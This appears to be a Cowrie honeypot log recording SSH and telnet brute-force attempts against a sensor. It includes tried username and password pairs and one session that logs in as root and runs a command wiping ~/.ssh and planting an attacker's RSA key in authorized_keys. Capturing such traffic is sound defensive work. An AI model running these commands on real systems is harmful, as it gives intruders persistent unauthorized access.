{"eventid":"cowrie.session.closed","duration":0.0010685920715332031,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.258524Z","src_ip":"45.227.254.151","session":"ea2ba4827fc9"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.151","src_port":8866,"dst_ip":"1.2.3.4","dst_port":23,"session":"32a24460689c","protocol":"telnet","message":"New connection: 45.227.254.151:8866 (1.2.3.4:23) [session: 32a24460689c]","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.273485Z"}
{"eventid":"cowrie.session.closed","duration":0.023717880249023438,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.297133Z","src_ip":"45.227.254.151","session":"32a24460689c"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.151","src_port":9008,"dst_ip":"1.2.3.4","dst_port":23,"session":"f53296b7c4cd","protocol":"telnet","message":"New connection: 45.227.254.151:9008 (1.2.3.4:23) [session: f53296b7c4cd]","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.313751Z"}
{"eventid":"cowrie.session.closed","duration":0.0735173225402832,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.387210Z","src_ip":"45.227.254.151","session":"f53296b7c4cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53756,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba8f504d8cb1","protocol":"ssh","message":"New connection: 212.227.235.229:53756 (1.2.3.4:22) [session: ba8f504d8cb1]","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.070149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.072095Z","src_ip":"212.227.235.229","session":"ba8f504d8cb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50054,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d8588e30f84","protocol":"ssh","message":"New connection: 212.227.235.229:50054 (1.2.3.4:22) [session: 7d8588e30f84]","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.323200Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.324348Z","src_ip":"212.227.235.229","session":"ba8f504d8cb1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.331058Z","src_ip":"212.227.235.229","session":"7d8588e30f84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:17:34.585965Z","src_ip":"212.227.235.229","session":"7d8588e30f84"}
{"eventid":"cowrie.login.failed","username":"mos","password":"12345678","message":"login attempt [mos/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:17:35.341654Z","src_ip":"212.227.235.229","session":"ba8f504d8cb1"}
{"eventid":"cowrie.login.failed","username":"gateway","password":"gateway","message":"login attempt [gateway/gateway] failed","sensor":"my-vps","timestamp":"2025-09-09T02:17:35.618514Z","src_ip":"212.227.235.229","session":"7d8588e30f84"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:36.597736Z","src_ip":"212.227.235.229","session":"ba8f504d8cb1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:36.877431Z","src_ip":"212.227.235.229","session":"7d8588e30f84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48942,"dst_ip":"1.2.3.4","dst_port":22,"session":"2223e05f30ac","protocol":"ssh","message":"New connection: 212.227.235.229:48942 (1.2.3.4:22) [session: 2223e05f30ac]","sensor":"my-vps","timestamp":"2025-09-09T02:17:43.280367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:17:43.281187Z","src_ip":"212.227.235.229","session":"2223e05f30ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:17:43.364510Z","src_ip":"212.227.235.229","session":"2223e05f30ac"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-09-09T02:17:43.740268Z","src_ip":"212.227.235.229","session":"2223e05f30ac"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:44.826634Z","src_ip":"212.227.235.229","session":"2223e05f30ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55962,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b75202302dc","protocol":"ssh","message":"New connection: 212.227.235.229:55962 (1.2.3.4:22) [session: 7b75202302dc]","sensor":"my-vps","timestamp":"2025-09-09T02:18:06.910117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:06.916949Z","src_ip":"212.227.235.229","session":"7b75202302dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:07.303931Z","src_ip":"212.227.235.229","session":"7b75202302dc"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Welcome1","message":"login attempt [ubuntu/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:18:08.855698Z","src_ip":"212.227.235.229","session":"7b75202302dc"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:10.252326Z","src_ip":"212.227.235.229","session":"7b75202302dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45368,"dst_ip":"1.2.3.4","dst_port":22,"session":"227f4168e571","protocol":"ssh","message":"New connection: 212.227.125.160:45368 (1.2.3.4:22) [session: 227f4168e571]","sensor":"my-vps","timestamp":"2025-09-09T02:18:13.485877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:18:13.486596Z","src_ip":"212.227.125.160","session":"227f4168e571"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T02:18:13.724570Z","src_ip":"212.227.125.160","session":"227f4168e571"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:21.486253Z","src_ip":"212.227.125.160","session":"227f4168e571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50844,"dst_ip":"1.2.3.4","dst_port":22,"session":"178fa87f3575","protocol":"ssh","message":"New connection: 212.227.235.229:50844 (1.2.3.4:22) [session: 178fa87f3575]","sensor":"my-vps","timestamp":"2025-09-09T02:18:38.300451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:38.301286Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:38.564894Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34547,"dst_ip":"1.2.3.4","dst_port":22,"session":"7372ea3c16f6","protocol":"ssh","message":"New connection: 212.227.235.229:34547 (1.2.3.4:22) [session: 7372ea3c16f6]","sensor":"my-vps","timestamp":"2025-09-09T02:18:39.349908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:39.352190Z","src_ip":"212.227.235.229","session":"7372ea3c16f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:39.606369Z","src_ip":"212.227.235.229","session":"7372ea3c16f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Ww@123456","message":"login attempt [root/Ww@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:18:39.661695Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:18:40.258051Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:18:40.258770Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:18:40.260047Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:40.526185Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"1","message":"login attempt [muhammad/1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:18:40.619590Z","src_ip":"212.227.235.229","session":"7372ea3c16f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:18:41.113425Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.114110Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.380262Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.381173Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52126,"dst_ip":"1.2.3.4","dst_port":22,"session":"230a70b512c7","protocol":"ssh","message":"New connection: 212.227.235.229:52126 (1.2.3.4:22) [session: 230a70b512c7]","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.627470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.628270Z","src_ip":"212.227.235.229","session":"230a70b512c7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.873577Z","src_ip":"212.227.235.229","session":"7372ea3c16f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:41.878636Z","src_ip":"212.227.235.229","session":"230a70b512c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37412,"dst_ip":"1.2.3.4","dst_port":22,"session":"09bdbe3a362f","protocol":"ssh","message":"New connection: 212.227.235.229:37412 (1.2.3.4:22) [session: 09bdbe3a362f]","sensor":"my-vps","timestamp":"2025-09-09T02:18:42.300907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:42.301771Z","src_ip":"212.227.235.229","session":"09bdbe3a362f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-